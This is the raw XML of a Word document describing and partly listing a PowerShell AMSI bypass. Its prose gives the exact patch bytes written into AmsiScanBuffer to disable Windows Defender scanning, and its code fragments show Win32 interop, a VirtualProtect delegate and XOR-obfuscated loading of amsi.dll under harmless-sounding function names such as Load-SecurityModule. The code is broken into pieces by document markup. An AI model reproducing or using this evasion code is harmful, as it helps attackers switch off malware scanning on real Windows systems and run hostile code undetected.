          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.wclysnhvv4v5" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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Modifies memory permissions with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VirtualProtect (flag 0x40)</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and injects payload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0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 into the first 6 bytes of the AmsiScanBuffer function.</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Result: the function always returns the error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E_INVALIDARG, disabling Windows Defender scanning.</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Orchestration Function (Invoke-SecurityCheck)</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b w:val="1"/>
          <w:bCs w:val="1"/>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Coordinates the entire attack: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initializes Win32 APIs → locates amsi.dll</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 retrieves address of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AmsiScanBuffer → applies patch.</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Returns $true when the environment is compromised.</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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function Initialize-SystemHelper {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    $SystemHelper = @</w:t>
      </w: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9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using System;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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using System.Runtime.InteropServices;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">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9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public class SystemHelper {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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[DllImport("</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel32</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9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extern</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IntPtr GetProcAddress(IntPtr hModule, string procName);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">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A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[DllImport(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"kernel32"</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static</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extern</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IntPtr LoadLibrary(string name);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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A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A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Add-Type $SystemHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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return [SystemHelper]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">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A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">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function Get-VirtualProtectDelegate {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">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param(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">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$SystemClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">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A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A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$DelegateType = @"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> System;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.Runtime.InteropServices;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">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B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967d2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">public</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> delegate bool VirtualProtectDelegate(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">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Add-Type $DelegateType</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">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    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    $Kernel32Module = $SystemClass::LoadLibrary("</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel32.dll</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$VirtualProtectAddress = $SystemClass::GetProcAddress($Kernel32Module, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"VirtualProtect"</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B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B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($VirtualProtectAddress -eq [IntPtr]::Zero) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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throw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Failed to get VirtualProtect address"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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B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B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$VirtualProtectDelegate = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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$VirtualProtectAddress,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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[VirtualProtectDelegate]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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$VirtualProtectDelegate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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4">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C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function Load-SecurityModule {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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$SystemClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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C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$EncryptedRequestUrl = [Byte[]] (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x04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0x1B</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0x47</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0x09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0x09</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C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$XorKey = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"evasive"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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$RequestUrl = Decode-XORString -EncryptedString $EncryptedRequestUrl -XorKey $XorKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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$Response = $SystemClass::LoadLibrary($RequestUrl)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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D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($Response -eq [IntPtr]::Zero) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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throw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Failed to load security module"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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D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D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$Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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D6">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D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function Get-FunctionAddress {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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$SystemClass,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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$SecurityModule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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D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D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$EncryptedMethodName = [Byte[]] (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x24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0x1B</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0x12</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0x3A</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0x04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0x0B</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0x34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0x15</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0x0F</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0x13</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0x17</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$XorKey = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"evasive"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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$MethodName = Decode-XORString -EncryptedString $EncryptedMethodName -XorKey $XorKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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$Header = $SystemClass::GetProcAddress($SecurityModule, $MethodName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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($Header -eq [IntPtr]::Zero) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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throw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Failed to get function address"</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E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$Header</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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EA">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E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function Decode-XORString {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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[Byte[]]$EncryptedString,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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[string]$XorKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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$KeyBytes = [System.Text.Encoding]::ASCII.GetBytes($XorKey)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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$DecodedBytes = New-Object Byte[] $EncryptedString.Length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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7474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ($i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$i -lt $EncryptedString.Length; $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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$DecodedBytes[$i] = $EncryptedString[$i] -bxor $KeyBytes[$i % $KeyBytes.Length]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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0F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[System.Text.Encoding]::ASCII.GetString($DecodedBytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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0FC">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F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function Decode-XORPayload {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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[Byte[]]$EncryptedPayload,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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[Parameter(Mandatory=$true)]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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[string]$XorKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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$KeyBytes = [System.Text.Encoding]::ASCII.GetBytes($XorKey)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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$DecodedPayload = New-Object Byte[] $EncryptedPayload.Length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ($i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$i -lt $EncryptedPayload.Length; $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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$DecodedPayload[$i] = $EncryptedPayload[$i] -bxor $KeyBytes[$i % $KeyBytes.Length]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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0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$DecodedPayload</w:t>
      </w:r>
    </w:p>
